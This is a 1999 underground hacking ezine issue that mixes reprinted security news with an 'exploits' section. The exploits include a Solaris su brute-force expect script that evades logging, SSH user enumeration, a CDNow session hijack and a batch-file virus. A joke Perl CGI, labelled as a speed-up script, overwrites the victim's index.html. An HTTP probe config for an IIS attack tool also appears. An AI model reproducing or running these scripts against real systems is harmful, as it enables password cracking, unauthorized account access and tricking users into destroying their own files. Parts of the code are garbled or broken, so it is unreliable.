Volume 2 Issue 9 6/19/99

http://www.thepoison.org/antidote

------------------------------

In this issue of Antidote, we have over 680 subscribers and are getting more every day! The only thing that we ask of you when you read Antidote is that you go to:

www.thepoison.org/popup.html

and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you.

--=\\Contents\\=--

0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing

1.00 - News
1.01 - AntiOnline Under Investigation
1.02 - Hacking No Longer a Prank
1.03 - Deadly Worm on the Run
1.04 - US Senate Cracked AGAIN

2.00 - Exploits (new & older)
2.01 - solaris_2.5.su.expect.cgi
2.02 - sun.useradd.expir_date.txt
2.03 - aim.ip_address.txt
2.04 - cdnow.account_access.txt
2.05 - ssh-2.0.brute_force.txt

3.00 - Misc
3.01 - I Only Replaced index.html
3.02 - virii.bat.txt

4.00 - ISS Portfolio
4.01 - wired.com
4.02 - infoworld.com
4.03 - iss_brain.ini.txt
4.04 - iss_injecter.c.txt

FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just something totally stupid and MAYBE even humorous to some.

SAY.W - SAY WHAT?
Various quotes that might be humorous, stupid, true, or just plain making fun of something or someone.

FEAT.S - FEATURED SITES:
www.nudehackers.com
www.thepoison.org/masters/exploits2/
www.403-security.org
www.hackernews.com

------------------------------

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\FAQ\\=--

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions, and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?

See section 0.01 for a complete description.

> I find Antidote is not aimed at the beginner and does not teach you the basics, why is that?

Antidote is for everyone; all we basically are is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?

Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive a link to the current Antidote (where you can view it).

> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?

Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?

It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?

Yes you can, we take information that is written by anyone regardless of whether you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

0.03 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here, and we are sorry for the misunderstanding. Well, here are the shout outs:

Lord Oak
EazyMoney
Duece
opt1mus
PBBSER
oX1dation
Forlorn
Retribution
0dnek
www.thepoison.org

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------

0.04 --=\\Writing\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security.
This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks, that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it.

Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask whether someone has already written on this topic, so that you don't waste your time writing something that won't be published. An example of this would be: Joe sends me an e-mail with the topic being on hacking hotmail accounts on Thursday, and then Bill sends us an e-mail on hacking hotmail accounts on Sunday; we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue!

If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).

------------------------------

http://www.403-security.org
For the latest hacks and news

1.01 --=\\AntiOnline Under Investigation\\=--

June 10, 1999
Brian Martin - Founder of ATTRITION

Today, Attrition staff learned that the FBI have opened investigations into John Vranesevich and AntiOnline.
Trusted sources close to the investigation would not comment on the depth or details, but one agent would state "it has been going on longer than you think". When asked if Vranesevich's recent "change of mission" was in any way related to the investigation, the agent only replied "no comment at this time."

The timing of this investigation coincides with AntiOnline's change of heart regarding hacker activity and law enforcement. After a shocking change of mission statement in which Vranesevich practically admits to crime, he pledges to help law enforcement by "helping to serve, even if in some very small way." Vranesevich goes on to say "I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are." This ominous threat was not received well by the hacker community. A hacker called "h4r1k1r1" said "JP's 'contribution' to the hacker community has been little more than creating FUD, and promoting the puerile ideals of script kiddies worldwide."

One staff member from Attrition going by Punkis reminded us of the now prophetic words from Vranesevich, who said "I could make just as much, if not more money, by hunting down hackers and turning them in." These words were said by Vranesevich on April 5th of this year.

(FUD means 'Fear, Uncertainty, and Doubt')

-EOF

------------------------------

1.02 --=\\Hacking No Longer a Prank\\=--

[www.msnbc.com]

IN THIS DIGITAL AGE, your company, whether it be an Amazon, E-Trade or some idea still forming, is built on a brand, a process and an information infrastructure. The way your site appears on the Web; the process by which a Web visitor can maneuver and buy products; and the ability of your site to scale, connect to suppliers and customers, and securely maintain a digital relation will determine your success. Sites that scale and allow you to shop comfortably in a digital store can quickly extend their brands from books to auctions to pet foods and beyond.
Sites that crumble while you and the rest of the panicked investment community try to bail out on a stock will find themselves abandoned and facing a new realm of legal liabilities. Hacked sites visibly and fundamentally shake the faith in the brand and the products being offered at the digital storefront.

This loss of faith in the brand carries over to and is magnified in the government realm. Internet access is on the verge of becoming sufficiently ubiquitous to allow organizational functions to move to the Web. If the first big thing the Web allowed was personal access and community building from the ground up, the next big thing is allowing existing organizations to use the Web to assume previously cumbersome functions. Vote on the Web? Sure. Register your car via the Web. File your taxes. Get your refund. All these functions are certainly possible.

What is missing is trust. Trust is a difficult dimension to describe, but it most clearly is apparent in its absence. Don't ask a citizenry to register to vote via the Web if the government's top legal agencies can't keep their home pages free from graffiti. And it is the trust that is shaken when the White House site is hacked. Or the FBI site. Or the Senate site.

Hacking is more than breaking a few minor laws. Hacking is certainly not just being a good digital citizen by showing the security gaps that now exist to prevent more serious transgressions in the future. Hacking is neither clever nor funny, nor something to be tossed off as adolescent humor from sci-fi-addled minds. Hacking retards the growth of a Web-accessible government and should hold penalties proportional to the crime.

http://www.msnbc.com/news/278369.asp#BODY

------------------------------

1.03 --=\\Deadly Worm on the Run\\=--

[www.abcnews.go.com]

A new and very destructive computer worm, distributed much the same way as the Melissa virus, is quickly spreading throughout computers in the United States.
Hundreds, if not thousands, of machines have already been infected. According to anti-virus experts, the Worm.Explorer.Zip virus first started in Israel on or about Sunday, spreading quickly to Europe. It was first reported in the United States on Tuesday, with the bulk of reports coming in today.

[Image caption: If you see this window, you may already have the new worm virus. The worm then proceeds to copy itself to the system directory with the filename Explore.exe and begins to harvest e-mail addresses in order to propagate itself. (ABCNEWS.com)]

"This worm is designed to spread from network to network very quickly," says Carey Nachenberg, chief researcher at Symantec Corp.'s Anti-Virus Research Center. "This has already affected thousands of machines overseas."

How It Works

The virus primarily affects users of Microsoft's Outlook e-mail program, though any e-mail user who receives a tainted message could be in trouble. The worm enters a target computer through an e-mail that appears to have come from someone the user e-mailed before. It comes with a file attachment called zipped_files.exe. The text of the e-mail customarily reads:

Hi [Recipient Name]!
I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs.
Bye

If a user then clicks to open that file, the worm is activated. It proceeds to randomly destroy certain files on the target computer, then replicates itself through the e-mail addresses in the in box. "This doesn't work through Microsoft Word like Melissa did, and it has the potential to spread far more rapidly," Nachenberg says.

Officials with the Computer Emergency Response Team (CERT) at Carnegie-Mellon University in Pittsburgh have yet to figure out whether the lost data can be recovered.

Reports Continue to Come In

At least six different major corporations in the United States have reported the virus to Symantec.
CERT technical staffer Mark Zajicek says at least 20 first-hand reports have been logged by his team, along with many second-hand reports of even more damage. "We have no idea when this will drop off," Zajicek says. "It's safe to say that thousands of users have been affected."

A spokeswoman for Microsoft Corp. confirmed that the company shut down its outside e-mail this morning in order to update anti-virus and contain any outbreaks on its Redmond, Wash., campus. The company is also planning to post letters to its Outlook customers on how to combat the virus.

How to Stop It

The easiest thing to do to stop the worm is for computer users to be aware of it so that they won't click on the zipped_files.exe icon to activate it. Nachenberg says that although corporate users are far more likely to become infected by the worm, Outlook users have learned safe computing practices from the Melissa scare, and may halt the spread of the worm before it causes major damage. "I think many corporations did a good job of educating their users about safe computing," Nachenberg says. "Hopefully this won't spread as far as the Melissa virus."

Users who see the virus in their in boxes should leave the attachment alone, delete the e-mail, and let their system administrators know about the infection immediately. Anti-virus software should also be used. Symantec Corp. and other anti-virus software vendors already have patches on their Web sites.

http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html

------------------------------

1.04 --=\\US Senate Cracked AGAIN\\=--

[www.wired.com]

For the second time in two weeks, crackers on Friday defaced the Web page of the US Senate. The official Senate Web site was down as of Friday afternoon while administrators repaired and restored the network.

A cracker replaced the official page with one that said "free Kevin Mitnick, free Zyklon."

An employee of US Senate Technical Operations said the site went down around 4 p.m. EST but couldn't say when the site might come back up.

"Those of us who haven't been hacked yet are just trying to lay low and beef up security as we can," said Sean Donelan, a network engineer for Data Research Associates, a nationwide Internet service provider that works with state governments, libraries, and schools.

Donelan said that each government agency is having to reinforce security independently and that outside vendors working with the government departments consider their security solutions proprietary.

"[We] are also trying not to attract attention and not waving a red flag challenging anyone to 'test' our security," Donelan said.

The Senate home page was previously cracked on 27 May. In that incident, crackers filled the page with comments critical of the FBI. That hack was claimed by the group Masters of Downloading, who broadcast the message "MAST3RZ 0F D0WNL0ADING, GL0B4L D0MIN8T10N '99!" on the Senate's site.

The Varna Hacking Group claimed responsibility for the latest Web vandalism. The organization claims it is a "noncommercial hacking group." Varna is based in Bulgaria, according to reports of a 1998 attack that members claimed to have launched against the Cartoon Network.

Zyklon, mentioned in Friday's incident, is alleged to be a 19-year-old hacker from Shoreline, Washington. He was indicted in early May for his alleged involvement in other government site hacks.

Many of the recent hacks demanded justice for imprisoned cracker Kevin Mitnick, who has been in jail for more than four years awaiting trial on a broad swath of criminal charges.

http://www.wired.com/news/news/politics/story/20180.html

------------------------------

1.05 --=\\Voting Mouse\\=--

[www.usnews.com]

You can already bank, buy, and bargain on the Internet. Even pay your taxes. What's next? Voting. At least if some Louisiana politicians have their way.
The Louisiana Republican Party late last week was set to allow registered GOP voters to cast their ballots via computer in the Jan. 29, 2000, presidential caucus. "What this does is create thousands of polling places that never existed before," says Carey Holliday, an attorney and member of a GOP advisory panel that voted, 5 to 2, to endorse the use of Internet voting. After all, voters need only plunk down and switch on their computer, tap a few keys, and civic duty accomplished.

Several legislatures are also considering allowing computer voting in statewide elections. A pilot Pentagon program will allow residents of Florida, Missouri, South Carolina, Texas, and Utah living abroad to vote over the Web next year.

In Louisiana, Republicans hope the move will push up voter turnout, which hovered at an anemic 5 percent in the state's last presidential caucus in 1996. "It's been a big problem for us," says Rep. Chuck McMains. "I think this could be a great opportunity for people to participate and, in the process, get better representation." Party officials blamed the abysmal showing on a lack of polling places. Recent studies by VoteHere.Net, the software company that developed the voting system Louisiana Republicans are considering, show computer balloting would be embraced by 76 percent of voters ages 18 to 30 and by 50 percent of voters over age 50. What effect this would have on who wins the elections is anybody's guess.

Hacker fraud. It sounds simple enough. Yet not everyone is convinced. Critics' major concern: the potential for abuse. But VoteHere.Net says its program is one of the toughest for hackers to crack or voters to fool. "Ours is the only election system that automatically prevents tampering and box stuffing as it sniffs out voter fraud attempts and malicious hackers," says Don Carter, senior vice president of VoteHere.Net. To safeguard against fraud, voters would be required to provide information such as birth dates and Social Security numbers.
To preserve privacy, the system uses one of the toughest encryption programs available to the public, says Carter, and balloters must give a voter encrypted registration number (VERN), provided when they register to vote via computer, to guarantee they vote only once.

That's not good enough for one key dissenter. "I don't totally disagree with the concept, but our traditional process is a good one," says party chairman Mike Francis. His solution is to increase the voting sites. "You could give away TV sets at the polling places, and you still wouldn't get more than 100,000 voters [out of the state's approximately 600,000 Republicans] to show up," he says.

http://www.usnews.com/usnews/issue/990621/internet.htm

------------------------------

http://www.nudehackers.com

2.01 --=\\solaris_2.5.su.expect.cgi\\=--

#!/usr/local/bin/expect --
# A quick little sploit for a quick round of beers :) mudge@L0pht.com
#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember.
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
#             attempt to SU
#                   |
#               successful
#                 /   \
#                Y     N
#                |     |
#            exec cmd  sleep
#                       |
#                     syslog
#                       |
#                      exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occurred.
#
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
# .mudge

if { ($argc < 1) || ($argc > 1) } {
    puts "correct usage is : $argv0 pwfile"
    exit
}

set pwfile [open $argv "r"]

log_user 0

foreach line [split [read $pwfile] "\n"] {
    spawn su root
    expect "Password:"
    send "$line\n"
    # you might need to tweak this but it should be ok
    set timeout 2
    expect {
        "#" { puts "root password is $line\n" ; exit }
    }
    set id [ exp_pid ]
    exec kill -INT $id
}

------------------------------

2.02 --=\\sun.useradd.expir_date.txt\\=--

This has been tested and verified only on Solaris 7.

Sun has provided a useradd binary as well as the gui (admintool) for adding new users. This program (it's a binary in Solaris 7) allows the "-e" parameter which purports to set the expiration date for a new account. The man page for it says:

-e expire
    Specify the expiration date for a login. After this date, no user will be able to access this login. expire is a date entered in any format you like (except a Julian date). If the date format that you choose includes spaces, it must be quoted. For example, you may enter 10/6/90 or "October 6, 1990". A null value (" ") defeats the status of the expired date. This option is useful for creating temporary logins.

The key here is that it says: "in any format you like". Using the system as it ships and using the parameter as (for example) "-e 6/30/2000" (in a vain attempt to avoid Y2K confusion) results in an expiration date of June 30, 2020, so if you are expecting the user accounts to expire soon, you will be a little disappointed. If expiration dates are critical, you have a real problem - users can login for 20 years after you thought you had expired them!
Workaround (supplied by Sun): replace /etc/datemsk with:

#ident
%m/%d/%y %I:%M:%S %p
%m/%d/%Y %I:%M:%S %p
%m/%d/%y %H:%M:%S
%m/%d/%Y %H:%M:%S
%m/%d/%y %I:%M %p
%m/%d/%Y %I:%M %p
%m/%d/%y %H:%M
%m/%d/%Y %H:%M
%m/%d/%y
%m/%d/%Y
%m/%d
%b %d, %Y %I:%M:%S %p
%b %d, %Y %H:%M:%S
%B %d, %Y %I:%M:%S %p
%B %d, %Y %H:%M:%S
%b %d, %Y %I:%M %p
%b %d, %Y %H:%M
%B %d, %Y %I:%M %p
%B %d, %Y %H:%M
%b %d, %Y
%B %d, %Y
%b %d
%m\%d\%H\%M\%y
%m\%d\%H\%M\%Y
%m\%d\%H\%M
%m\%d\%H
%m%d

Your mileage may vary. I have not tested this to make sure it works correctly with 2-digit years (lower case 'y' in the mask above.)

Sun has been notified of this and of the posting to BUGTRAQ.

Chad Price
cprice@MOLBIO.UNMC.EDU

------------------------------

2.03 --=\\aim.ip_address.txt\\=--

IU Uprising (iuprising@HOTMAIL.COM)
Tue, 8 Jun 1999 18:39:50 PDT

In the newest version of AIM (AOL Instant Messenger) there is a way to transfer files. When you are transferring the file, you can open a DOS prompt and type:

netstat -a -n

By doing this you (obviously) can get the person's IP address. Usually it will be on port 5190. This may seem pointless because usually not much can be done with simply an IP address, but under certain circumstances this can be useful.

a|chEmist

------------------------------

2.04 --=\\cdnow.account_access.txt\\=--

Last week I stumbled across the following security hole in CDNow!, the online cd-store. I emailed CDNow! regarding this immediately but as yet have not had any confirmation of receipt or response, so I decided to post the information here. This is a copy of the email that I sent to CDNow.

Security Hole Found

I was just looking at my gift list, and pasted the URL to a mailing list.
That is, the URL in my location bar. After doing so I thought, wait, that's not the URL I should have posted, so I then sent the proper URL, thinking that CDNOW is password protected and no one would be able to get to my account, but I decided to check by telnetting to a remote machine and going to that URL. The result was, I got a rejected cookie, and the page continued to load my gift list (in edit mode). I then followed a link to my account history and details, and initiated steps to order a cd. I'm assuming the SID parameter in the URL was looking up the open transaction/connection that I made from my local machine and was using that.

My assumption is that this URL would only be valid for a certain amount of time, so the security flaw will eventually, in an hour or so, be closed off (I hope); however, the fact is that this hole does exist.

Mark Derricutt
DerricuttM@PBWORLD.COM

------------------------------

2.05 --=\\ssh-2.0.brute_force.txt\\=--

Aleph ... Sorry if it is an old bug ... I have tested a bug in ssh-2.0.12. Any remote attacker can guess real accounts on the machine.

Details

When a ssh client connects to the daemon it has a number (default three) of attempts to guess the correct password before disconnecting if you try to connect with a correct login, but you only have one if you try to connect with an incorrect login.

EXAMPLE

alfonso is not a user (login) on 192.168.0.1

$ ssh 192.168.0.1 -l alfonso
alfonso's password:
Disconnected; authentication error (Authentication method disabled.).
$

altellez is a user (login) on 192.168.0.1

$ ssh 192.168.0.1 -l altellez
altellez's password:
altellez's password:

Now the remote attacker knows that altellez is a true login on 192.168.0.1

QUICK FIX

Edit the file sshd2_config (usually at /etc/ssh2), set the value of "PasswordGuesses" to 1.
I have only tested it with ssh-2.0.12

Alfonso Lazaro Tellez
altellez@ip6seguridad.com

------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

FUN.S

#!/usr/bin/perl
print "Content-type: text/html\n\n";
# Make your server go faster with this script!
# Works on any OS and minor editing is needed!
$path = "/home/username/"; # homedirectory
chdir($path);
open (EDIT,">index.html");
print EDIT <<EOF;
Lord Oak 0wnz me!
I b0w to Lord Oak!
EOF
close (EDIT);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

3.01 --=\\I Only Replaced index.html\\=--

It would appear that the k-r4d kiddies who deface web pages have no concept of WHY their shenanigans elicit such a violent response from the companies they attack. This brief article will list some of the behind the scenes events that occur after the "harmless" replacement of index.html by our oh-so-favorite political activists.

1. The company is notified, usually by a customer, that their web page has been changed. The server admin, Web Master, or whomever is responsible for the content is usually the first person to be told of this event, as the company probably doesn't have an incident response plan.

2. The admin shits a brick and tells his manager. The administrator, now in fear for his job, has to bite the bullet and tell his manager that the company has been "hacked". He's probably afraid that the attacker got in through his weak password, or one of the boxes he knows he should have upgraded six months ago.

3. Upon hearing this, the manager shits a brick. The mid-level manager now fears for HIS job knowing that the brunt of upper management's wrath will fall on his shoulders for not securing the systems. The manager tries desperately to figure out whom to tell in upper management that will not fire him on the spot. He calls his manager (usually a VP type) and tells her the news.

4. Upon hearing this, she freaks out and shits a brick. The VP calls Human Resources, Legal, Security (if it exists), and the Director of Engineering or some other high-level geek type. The group collectively decides if the site should be taken down or remain up. A call is also made to the CEO or other chieftain to inform him of the situation. After a quick consultation with the in-house counsel, the decision to contact or not contact law enforcement is made.
Usually, the upper level types are in knee-jerk mode and want to aggressively pursue the intruder "no matter what".

5. All this time, the overworked admin has been scouring his systems looking for traces of how the attacker got in. Despite the attacker's claims that "he only replaced index.html", the admin's manager wants EVERY system checked and any possible means of entry sealed off. The admin will now try to perform a comprehensive security audit in an hour.

6. The upper level types contact the Marketing department to figure out how to handle the impact to the company's image. Never having faced this sort of problem before, the Director of Marketing frets and calls all her people in for "a brainstorm" on how to handle the situation.

7. The system is probably backed-up, taken down, and replaced with a newer box, or a significant upgrade (introducing new bugs) is made to the system. This takes the busy admin the better part of a day. Normally, this could be accomplished in a few hours, but with visibility at the VP and above level, the admin makes sure he does it perfectly.

8. If law enforcement was called in, they now spend time with the administrators and lawyers to figure out if they have a case (probably not; most of the evidence was accidentally destroyed by the admin in the first 4 hours after the incident).

9. Upper level types now decree that the systems will be secured and that nothing like this will ever happen again. It's likely that big name consultants are brought in at $200+/hour to assess the business and make recommendations to improve the site's security. Since the admin is already busy doing day-to-day tasks, the consulting firm probably implements their recommendations (at $200+/hour).

10. After a few weeks, things return to normal. The company has new ACLs, a new firewall, and maybe some new policies.
Now, looking at this, one can see the number of personnel involved and the amount of time invested in recovering from the "harmless" defacing of index.html. I haven't even addressed the additional problems posed when the admins discover a trojanized binary or unauthorized access to source code or other company trade secrets. This is just the simple stuff.

"But the attacker said in his 'message' that he backed-up index.html. All they had to do was replace it with the original!"

No you stupid fool, no. The attacker has publicly humiliated a corporation, has shown the world that the site's security is inadequate, and has caused significant personal turmoil for 5 or more people. Furthermore, if I come home one day to find my front door open and a note attached that says "Hi. Broke into your place. Only moved your stuff around. Didn't take anything. Love, r0bb3r" am I supposed to believe that? Would you?

If the company affected is publicly traded, they are legally _required_ to investigate and take measures to ensure that a similar incident doesn't occur. If they don't, their shareholders can sue for negligence.

Now, I can't possibly justify the tens of millions in losses claimed by companies in cases like Mitnick or others - that's lunacy. However, reading the above, I hope it becomes clear that there is significant time and money spent to clean up these "simple" attacks.

-Anonymous

------------------------------

3.02 --=\\virii.bat.txt\\=--

@echo off>nul.virii
if exist %0.bat set virii=%0.bat
if exist %0 ste virii=%0
if !%1==! goto virii_start
if %1==/infect goto virii_infect
if %1==/find goto virii_find

:virii_start
REM Will find all batch files in current diectory
echo Finding files to infect with virii
for %%a in (*.bat) do command /e:10000 /c %virii% /infect %%a
goto virii_end

:virii_infect
REM This part makes sure virii does not infect itself or
REM previoulsy infected files
echo Checking %2 and making sure it has not been previously infected
set file_virii=%0
find "file_virii=%0" <%2>viriix.bat
call viriix
del viriix.bat
if "%file_virii%=="viriix echo %2 is allready infected
if "%file_virii%--"viriix exit
REM End of check
echo The virii is now infecting %2
type %2 > viriix.bat
find "virii" <%virii%>> viriix.bat
goto virii_end

:virii_end

I don't know what use this could be apart from an example of redirecting outputs and "for" commands.

[)igital^[)istortion
ICQ 34585986

------------------------------

4.01 --=\\wired.com\\=--

[www.wired.com]

A major security flaw in a Microsoft Web server could allow crackers to take complete control of e-commerce Web sites, security experts warned Tuesday.

The flaw in Microsoft's Internet Information Server 4.0 allows unauthorized remote users to gain system-level access to the server, according to Firas Bushnaq, CEO of eEye, the Internet security firm that discovered it.

"This hole is so serious it's scary," said Jim Blake, a network administrator for Irvine, a city in southern California. "With other [Windows NT] security holes, crackers have needed to gain some level of user access before executing code on the server. This is different.... Anybody off the Web can crack IIS," he said.

More than 1.3 million Microsoft IIS servers are up and running on the Web. Nasdaq, Walt Disney, and Compaq are among the larger e-commerce operations run off the server, according to NetCraft Internet surveys.

Microsoft confirmed that the problem exists and said that it is working on a fix. Customers, however, have not been notified.
"Normally we will post the problem and the bug fix at the same time," said Microsoft spokeswoman Jennifer Todd. "We take these security issues very seriously, and the patch will be available [soon]." The fix will be posted to Microsoft's security Web site , "probably in the next couple of days," Todd said. The exploit is just one of a long list of security flaws affecting IIS 4.0. In May, security experts found an exploit that enabled crackers to gain read access to files held on IIS when they requested certain text files. Last summer, an exploit known as the $DATA Bug granted any non-technical Web users access to sensitive information within the source code used in Microsoft's Active Server Page, which is used on IIS. And in January, a similar IIS security hole was discovered, one that exposed the source code and certain system settings of files on Windows NT-based Web servers. But the latest problem appears to be the most serious because of the level of access it reportedly allows. "The exploit gives crackers access to any database or software residing on the Web server machine," said Bushnaq. "So they could steal credit-card information or even post counterfeit Web pages." For instance, crackers could exploit the bug to modify stock prices at one of the many news and stock information sites running IIS. The hole allows remote users to gain control of an IIS 4.0 server by creating what is known as a "buffer overflow" on .htr Web pages -- an IIS feature designed to enable users to remotely change their passwords. A buffer overflow can occur when a system is fed a value much larger than expected. In the case of the bug, the Dynamic Link Library (DLL) governing the .htr file extension, called ISM.DLL, can be overloaded by running a utility that loads too many characters into the library. Once overloaded, the DLL is disabled and the content of the overflow "bleeds" into the system. 
"Normally, this would just crash the system," said Space Rogue, a member of L0pht Heavy Industries, an independent security consulting firm that last year testified before the United States Senate on government information security. "But a good cracker can write an exploit where the data that overflows will actually be a executable program that will run as machine code," said Space Rogue. Such a move could give a cracker complete control of the target system. The overflow executable program can be used to run a system-level program that will deliver the equivalent of a DOS command window to an attacker's PC. To demonstrate the hole, eEye wrote a program called IIS Hack that will enable users to crack and execute code on any IIS 4.0 Web Server. However, disabling or removing the .htr password utility will not fix the problem, according to Bushnaq. "You have got to go through a series of steps to remove the faulty [code]." Eeye discovered the problem while beta testing a network security auditing tool. "Remote exploits are about the most serious problems you can have with a Web server," said Space Rogue. "It gives the attacker root privileges, so the cracker not only has access to the IIS server but [to] software running on that machine." "In many corporate sites today, this will give the cracker access to the entire network" Eeye is a software development firm specializing in security audit tools. Chief executive Bushnaq previously founded the electronic commerce site ECompany.com . http://www.wired.com/news/news/technology/story/20231.html ------------------------------ 4.02 --=\\infoworld.com\\=-- [www.infoworld.com] A small security consulting firm traded punches with Microsoft this week over how to publicize a security flaw in Microsoft's Web server software. Microsoft posted an alert and workaround June 15, after the other company, eEye, posted a way to exploit the flaw, saying it was necessary to draw attention to the threat it poses. 
"It was demonstrating how serious this is. Microsoft has not responded to us since then," Firas Bushnaq, eEye CEO, said Thursday. Microsoft countered that it had been cooperating with eEye on the problem until the other company broke Microsoft's policy of publishing security warnings only once there is a remedy, so as not to reveal a breach to would-be exploiters. "Deliberately publishing a tool on one's Web site to let malicious users hurt innocent people is not being part of the solution," Microsoft security product manager Scott Culp countered on Thursday. "It is a mystery to us why [eEye] suddenly and abruptly chose to stop working with us and take this public." The flaw is a "buffer overflow" in Microsoft's Internet Information Server (IIS) 4.0. This could allow junk or malicious code to overwrite executable code, thereby making the Web server either crash or execute unauthorized commands, Culp said. Buffer overflows are caused by programmer error and are "very common... one of the biggest of all network security problems," Bushnaq said. The IIS 4.0 bug could give a hacker access to various data on the targeted Web server, including access to company files or customer information, depending on how the network is configured and which break-in approach is used, Bushnaq added. "It's a very, very serious problem that people need to fix as soon as possible," Bushnaq said. Officials at eEye notified Microsoft of the problem June 8, but were frustrated by the lack of response during the next several days, Bushnaq said. On Monday, June 14, the company decided to make the problem public. Since then, eEye has gotten hundreds of e-mail messages in favor of its decision, compared to about four criticizing it, Bushnaq said. "The big issue now is that Microsoft's PR is [painting] eEye as a company that's irresponsible and pointing to something bad," Bushnaq said. 
But Culp said Microsoft's security team had been working intensively with eEye, as it does with other companies and users that report security problems. They had had exchanged about 20 e-mail messages last week, before eEye unilaterally decided to go public, he said. "[Their decision] left a lot of people at risk ... compounded by irresponsibly publishing that [exploitation] tool," Culp said. Microsoft hopes to release the final patch very soon, Culp said. In the meantime, the company is offering a workaround in its June 15 security bulletin, which can be found at www.microsoft.com/security/bulletins/ms99-019.asp eEye's patch can be found at www.eeye.com/database/advisories/ ad06081999/ad06081999-ogle.html eEye, a unit of eCompany LLC, in Corona del Mar, Calif., is at www.eeye.com. Microsoft Corp., in Redmond, Wash., is at www.microsoft.com. http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm ------------------------------ 4.03 --=\\iss_brain.ini.txt\\=-- [General] Title=HTTP Miner [Commands] 1=GET /%%$RPT(65,40,10)%%.%%extention%% HTTP/1.0 ;2=GET /%%cgi-bin%%/%%passwordpath%%/%%passwordfile%%.%%extention%% HTTP/1.0 [Variables] cgi-bin=cgi-bin,cgi,bin,cgibin,data,dat,exec,apps,secure,hide, extention=htr,html,htx,asp,exe,xml,ini,txt,dat,dbf,lst,data, passwordpath=password,passwords,pass,users,clients,admins,store, passwordfile=password,passwords,pass,users,clients,admins,store, c0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c3=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c4=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c5=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c6=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, 
